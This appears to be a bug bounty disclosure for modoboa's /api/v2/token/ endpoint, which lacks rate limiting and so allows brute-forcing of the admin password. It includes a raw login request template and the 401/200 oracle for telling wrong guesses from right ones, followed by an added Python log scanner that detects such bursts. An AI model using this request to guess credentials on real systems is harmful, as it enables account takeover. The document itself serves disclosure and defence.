Admin TakeOver in modoboa/modoboa
Valid
Reported on Jan 26th 2023
Description
The endpoint /api/v2/token/ allows an unauthenticated user to brute-force credentials: the application does not block or throttle repeated requests, and the requests need no session cookie or even a CSRF token.
Request
POST /api/v2/token/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------25524418606542250161357131552
Content-Length: 301
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Gpc: 1
Te: trailers
Connection: close
-----------------------------25524418606542250161357131552
Content-Disposition: form-data; name="username"
admin
-----------------------------25524418606542250161357131552
Content-Disposition: form-data; name="password"
{PASSWORD-HERE}
-----------------------------25524418606542250161357131552--
This request returns one of two response codes, so each attempt tells the attacker whether the guessed password was right:
--> HTTP/1.1 401 Unauthorized :: for an incorrect password
--> HTTP/1.1 200 OK :: for the correct password
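The 401/200 distinction the report describes is also what a defender can key on in access logs while a rate limit is being put in place. The following Python script is an added example, not part of the report and not modoboa's code: it scans web-server access log lines for many 401 responses to POST /api/v2/token/ from one source address inside a short window, and separately flags a 200 from the same source after that run of failures, which is the signature of a guess that eventually succeeded. The log format, the sample lines, the threshold and the window size are constructed assumptions for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Login endpoint named in the report.
TOKEN_PATH = "/api/v2/token/"

# Assumed nginx/Apache "combined"-style access log layout (constructed, not from the report).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+'
)

# Constructed sample log: one address hammers the token endpoint and finally gets a 200,
# another address mistypes a password twice and then logs in normally.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Jan/2023:10:00:01 +0000] "POST /api/v2/token/ HTTP/1.1" 401 52
203.0.113.7 - - [26/Jan/2023:10:00:02 +0000] "POST /api/v2/token/ HTTP/1.1" 401 52
203.0.113.7 - - [26/Jan/2023:10:00:03 +0000] "POST /api/v2/token/ HTTP/1.1" 401 52
203.0.113.7 - - [26/Jan/2023:10:00:04 +0000] "POST /api/v2/token/ HTTP/1.1" 401 52
203.0.113.7 - - [26/Jan/2023:10:00:05 +0000] "POST /api/v2/token/ HTTP/1.1" 401 52
203.0.113.7 - - [26/Jan/2023:10:00:06 +0000] "POST /api/v2/token/ HTTP/1.1" 401 52
203.0.113.7 - - [26/Jan/2023:10:00:07 +0000] "POST /api/v2/token/ HTTP/1.1" 200 483
198.51.100.4 - - [26/Jan/2023:10:01:00 +0000] "POST /api/v2/token/ HTTP/1.1" 401 52
198.51.100.4 - - [26/Jan/2023:10:01:20 +0000] "POST /api/v2/token/ HTTP/1.1" 401 52
198.51.100.4 - - [26/Jan/2023:10:01:40 +0000] "POST /api/v2/token/ HTTP/1.1" 200 483
198.51.100.4 - - [26/Jan/2023:10:05:00 +0000] "GET /api/v2/domains/ HTTP/1.1" 200 1204
"""


def parse_line(line):
    """Return a dict with ip, ts, method, path, status, or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {
        "ip": m.group("ip"),
        "ts": ts,
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """Flag source IPs with >= threshold 401s on the token endpoint inside `window`,
    and flag a 200 that follows such a run (password guessing that succeeded)."""
    recent_failures = defaultdict(deque)  # ip -> timestamps of 401s still inside the window
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != TOKEN_PATH:
            continue
        q = recent_failures[rec["ip"]]
        # Slide the window: forget failures older than `window` relative to this request.
        while q and rec["ts"] - q[0] > window:
            q.popleft()
        if rec["status"] == 401:
            q.append(rec["ts"])
            if len(q) >= threshold and rec["ip"] not in flagged:
                flagged.add(rec["ip"])
                alerts.append({"ip": rec["ip"], "kind": "bruteforce",
                               "failures": len(q), "at": rec["ts"]})
        elif rec["status"] == 200 and len(q) >= threshold:
            # Successful login right after a burst of failures: treat as likely compromise.
            alerts.append({"ip": rec["ip"], "kind": "success_after_failures",
                           "failures": len(q), "at": rec["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(f'{alert["at"].isoformat()} {alert["ip"]} {alert["kind"]} '
              f'(failures in window: {alert["failures"]})')
```

Run against the constructed sample, the script reports 203.0.113.7 twice (the brute-force burst, then the success that followed it) and stays silent on 198.51.100.4, whose two failures stay under the threshold. The thresholds are deliberately conservative so that a user mistyping a password is not flagged; on a real deployment the same logic would be fed the web server's access log and the alert would be the cue to check for an unexpected admin session and to enable throttling on the endpoint.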
Proof Of Concept
Impact
Admin Take Over
References
We are processing your report and will contact the
modoboa
team within 24 hours.
2 months ago
We have contacted a member of the
modoboa
team and are waiting to hear back
2 months ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability has been assigned a CVE
@Maintainer @Admin
Is it possible to add here: https://github.com/modoboa/modoboa/security/advisories